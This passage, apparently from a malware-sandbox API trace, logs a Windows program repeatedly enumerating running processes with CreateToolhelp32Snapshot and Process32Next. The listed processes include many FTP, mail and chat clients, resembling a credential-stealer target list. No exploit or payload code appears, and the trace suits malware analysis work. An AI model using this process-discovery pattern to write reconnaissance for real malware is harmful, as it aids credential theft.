cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0233.236] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0233.238] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.259] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0233.263] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.274] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.283] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0233.287] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.291] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0233.294] CloseHandle (hObject=0x2200) returned 1 [0233.294] Sleep (dwMilliseconds=0x64) [0233.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x222c [0233.427] Process32First (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.430] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.432] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.434] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.437] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.439] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.441] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.443] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.445] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.504] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.507] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.511] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.513] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.516] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.518] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.526] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.530] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.542] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.591] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.593] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.596] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0233.599] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.601] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0233.607] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.612] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0233.618] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0233.680] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0233.683] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0233.688] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0233.691] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0233.694] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.703] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.706] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0233.711] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.713] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.715] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.718] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.719] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.721] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0233.741] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0233.743] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0233.745] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0233.747] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0233.748] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0233.750] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0233.752] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0233.753] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0233.755] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0233.758] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0233.760] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0233.761] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0233.763] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0233.765] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0233.766] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0233.768] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0233.770] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0233.773] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0233.774] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0233.776] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0233.781] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0233.783] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0233.785] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0233.787] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0233.789] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0233.791] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0233.793] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0233.795] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0233.797] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0233.799] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0233.802] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0233.804] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0233.806] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0233.808] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0233.809] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0233.811] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0233.813] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 